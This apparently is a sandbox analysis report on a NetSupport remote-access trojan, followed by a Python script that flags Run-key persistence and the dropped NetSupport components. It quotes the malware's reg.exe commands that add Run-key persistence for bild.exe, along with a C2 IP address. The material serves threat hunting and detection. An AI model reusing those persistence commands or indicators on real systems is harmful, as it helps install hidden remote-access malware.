Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8DBC3 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D95B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5F28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5F87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exe
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Shell_TrayWnd
Source: bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Progman
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8D8CB cpuid
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: GetLocaleInfoW,GetNumberFormatW (0_2_00D8932F)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage (5_2_11173A35)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s (5_2_11173D69)
Source: C:\Users\Public\Netstat\bild.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA (5_2_11173CC6)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoA (5_2_1116B38E)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA (5_2_11173933)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen (5_2_111739DA)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP (5_2_1117383E)
Source: C:\Users\Public\Netstat\bild.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA (5_2_11173D2D)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage (5_2_11173C06)
Source: C:\Users\Public\Netstat\bild.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat (5_2_6C60DC56)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP (5_2_6C601CC1)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoA (5_2_6C60DC99)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA (5_2_6C601DB6)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen (5_2_6C601E5D)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage (5_2_6C601EB8)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea (5_2_6C60DB7C)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage (5_2_6C602089)
Source: C:\Users\Public\Netstat\bild.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA (5_2_6C602175)
Source: C:\Users\Public\Netstat\bild.exe | Code function: EnumSystemLocalesA (5_2_6C602151)
Source: C:\Users\Public\Netstat\bild.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA (5_2_6C6021DC)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s (5_2_6C602218)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s (6_2_11173D69)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoA (6_2_1116B38E)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA (6_2_11173933)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen (6_2_111739DA)
Source: C:\Users\Public\Netstat\bild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP (6_2_1117383E)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage (6_2_11173A35)
Source: C:\Users\Public\Netstat\bild.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA (6_2_11173D2D)
Source: C:\Users\Public\Netstat\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage (6_2_11173C06)
Source: C:\Users\Public\Netstat\bild.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA (6_2_11173CC6)
Source: C:\Users\Public\Netstat\bild.exe | Queries volume information: C:\ VolumeInformation (9 occurrences)
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D7A8E0 GetVersionExW
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5DA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError
Source: Yara match | File source: 6.2.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.0.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.6f980000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.bild.exe.6f980000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.bild.exe.6f980000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.bild.exe.6cef0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.bild.exe.6f980000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.5322800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.6cef0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.6c5d0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.bild.exe.6cef0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.bild.exe.6cef0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.1825297800.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1826623935.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1712834967.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 7436, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7692, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7904, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 8120, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\bild.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED
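Two pieces of evidence in this report are directly reusable for hunting on other hosts: the process chain in which cmd.exe runs netsup.bat and reg.exe writes a "Netstat" value to both the HKCU and HKLM Run keys pointing at C:\Users\Public\Netstat\bild.exe (the "New RUN Key Pointing to Suspicious Folder" Sigma hit), and the set of NetSupport Manager client components dropped alongside it in the Yara DROPPED matches above. The Python below is an added example, not code from the Joe Sandbox report or from NetSupport: it parses reg.exe command lines as they would appear in process-creation telemetry (Sysmon event 1 or Windows 4688 with command-line auditing), flags Run/RunOnce values whose image sits in a user-writable directory, and matches a directory listing against the dropped component names. The two reg.exe command lines are copied from this report; the OneDrive and Contoso lines, the directory listing and the list of "user-writable" prefixes are constructed assumptions for the demonstration.

```python
"""Triage helpers for the Run-key persistence and NetSupport file drop seen above.

Added example; not code from the Joe Sandbox report or from NetSupport.
"""
import re

# Run and RunOnce keys under any hive (HKCU\..., HKLM\..., HKEY_USERS\<sid>\...).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)

# Directories an unprivileged user can write to. A Run value pointing here is the
# condition behind the "New RUN Key Pointing to Suspicious Folder" hit above.
# The exact list is an assumption; extend it for your estate.
USER_WRITABLE_RE = re.compile(
    r"^(c:\\users\\public\\|c:\\programdata\\|c:\\windows\\temp\\|"
    r"c:\\users\\[^\\]+\\(appdata|downloads)\\)",
    re.I,
)

# NetSupport Manager client components dropped next to bild.exe (file names from
# the "type: DROPPED" Yara matches above). The client EXE was renamed to bild.exe,
# so the DLL set is the stable indicator, not the EXE name.
NETSUPPORT_COMPONENTS = {
    "pcicl32.dll", "pcichek.dll", "htctl32.dll",
    "tcctl32.dll", "pcicapi.dll", "remcmdstub.exe",
}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping "quoted strings" whole."""
    return [q if q else w for q, w in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_reg_add(cmdline):
    """Return (key, value_name, data) for a `reg add` command line, else None."""
    toks = tokenize(cmdline)
    if len(toks) < 3:
        return None
    image = toks[0].lower().rsplit("\\", 1)[-1]
    if image not in ("reg", "reg.exe") or toks[1].lower() != "add":
        return None
    key, name, data = toks[2], "", ""
    i = 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag in ("/v", "/d", "/t") and i + 1 < len(toks):
            if flag == "/v":
                name = toks[i + 1]
            elif flag == "/d":
                data = toks[i + 1]
            i += 2
        else:
            i += 1  # /f, /reg:32 and similar flags take no argument
    return key, name, data


def image_from_data(data):
    """Pull the executable path out of Run-value data that may carry arguments."""
    m = re.match(r'\s*"?([^"]+?\.exe)', data, re.I)
    return m.group(1) if m else data.strip().strip('"')


def run_key_findings(cmdlines):
    """Flag Run/RunOnce writes; `suspicious` means the image is in a user-writable path."""
    findings = []
    for cmd in cmdlines:
        parsed = parse_reg_add(cmd)
        if parsed is None or not RUN_KEY_RE.search(parsed[0]):
            continue
        key, name, data = parsed
        image = image_from_data(data)
        findings.append({
            "key": key, "name": name, "image": image,
            "suspicious": bool(USER_WRITABLE_RE.match(image)),
        })
    return findings


def netsupport_components(listing):
    """Return the NetSupport client components present in a directory listing."""
    return sorted(NETSUPPORT_COMPONENTS & {name.lower() for name in listing})


# Constructed sample input. The first two lines are the reg.exe command lines
# recorded in this report; the other two are benign lines added for contrast.
SAMPLE_CMDLINES = [
    r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"',
    r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"',
    r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V OneDrive /t REG_SZ /d "C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"',
    r'REG ADD "HKCU\Software\Contoso\App" /V Installed /t REG_DWORD /d 1',
]
# Constructed listing of C:\Users\Public\Netstat, built from the files named in
# this report (netsup.bat from the cmd.exe line; the rest from the Yara hits).
SAMPLE_LISTING = ["bild.exe", "netsup.bat", "PCICL32.DLL", "PCICHEK.DLL",
                  "HTCTL32.DLL", "TCCTL32.DLL", "pcicapi.dll", "remcmdstub.exe"]

if __name__ == "__main__":
    for f in run_key_findings(SAMPLE_CMDLINES):
        tag = "SUSPECT" if f["suspicious"] else "ok     "
        print(f"{tag} {f['key']}\\{f['name']} -> {f['image']}")
    print("NetSupport components present:", netsupport_components(SAMPLE_LISTING))
```

Run against real telemetry, `run_key_findings` takes the CommandLine field of each reg.exe process-creation event; the same check should also be applied to Sysmon event 13 (registry value set), since persistence written through the registry API rather than reg.exe never produces a command line to parse. The component match is deliberately loose (any intersection is reported) because the legitimate NetSupport Manager client ships the same DLLs; what makes this drop malicious is the combination of the renamed client, the user-writable path and the Run key, not any one file name.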
MITRE ATT&CK Matrix (a leading number is the count of signatures mapped to that technique; entries without a number are the matrix's standard cells and carry no matched signature):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 12 System Time Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 4 Native API | 1 DLL Side-Loading | 2 Valid Accounts | 3 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 22 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 2 Valid Accounts | 21 Access Token Manipulation | 2 Software Packing | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 1 Windows Service | 1 Windows Service | 1 DLL Side-Loading | NTDS | 44 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 13 Process Injection | 1 Masquerading | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 13 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1580475
Sample: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Startdate: 24/12/2024
Architecture: WINDOWS
Score: 96

Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures
Contacted domain: geo.netsupportsoftware.com

Processes started from the sample: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe; bild.exe (three instances)

Files dropped by d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe:
- C:\Users\Public\Netstat\remcmdstub.exe (PE32)
- C:\Users\Public\Netstat\pcicapi.dll (PE32)
- C:\Users\Public\Netstat\bild.exe (PE32)
- 6 other files (3 malicious)

d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe -> cmd.exe
  Signature: Uses cmd line tools excessively to alter registry or file data
  cmd.exe -> bild.exe, conhost.exe, reg.exe, reg.exe

bild.exe network activity:
- 45.76.253.210, port 443 (local port 49730), AS-CHOOPAUS, United States
- geo.netsupportsoftware.com 104.26.1.231 (local ports 49731, 49732, 49733), CLOUDFLARENETUS, United States
bild.exe signatures: Multi AV Scanner detection for dropped file; Contains functionality to change the wallpaper; Delayed program exit found; Contains functionality to detect sleep reduction / modifications

Source | Detection | Scanner | Label
d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | 58% | ReversingLabs | Win32.Trojan.NetSupport

Source | Detection | Scanner | Label
C:\Users\Public\Netstat\HTCTL32.DLL | 3% | ReversingLabs |
C:\Users\Public\Netstat\PCICHEK.DLL | 3% | ReversingLabs |
C:\Users\Public\Netstat\PCICL32.DLL | 12% | ReversingLabs |
C:\Users\Public\Netstat\TCCTL32.DLL | 3% | ReversingLabs |
C:\Users\Public\Netstat\bild.exe | 29% | ReversingLabs | Win32.Trojan.NetSupport
C:\Users\Public\Netstat\msvcr100.dll | 0% | ReversingLabs |
C:\Users\Public\Netstat\pcicapi.dll | 3% | ReversingLabs |
C:\Users\Public\Netstat\remcmdstub.exe | 13% | ReversingLabs |
                                No Antivirus matches
Source | Detection | Scanner | Label
http://www.pci.co.uk/support | 0% | Avira URL Cloud | safe
http://45.76.253.210/fakeurl.htm | 0% | Avira URL Cloud | safe
http://%s/testpage.htmwininet.dll | 0% | Avira URL Cloud | safe
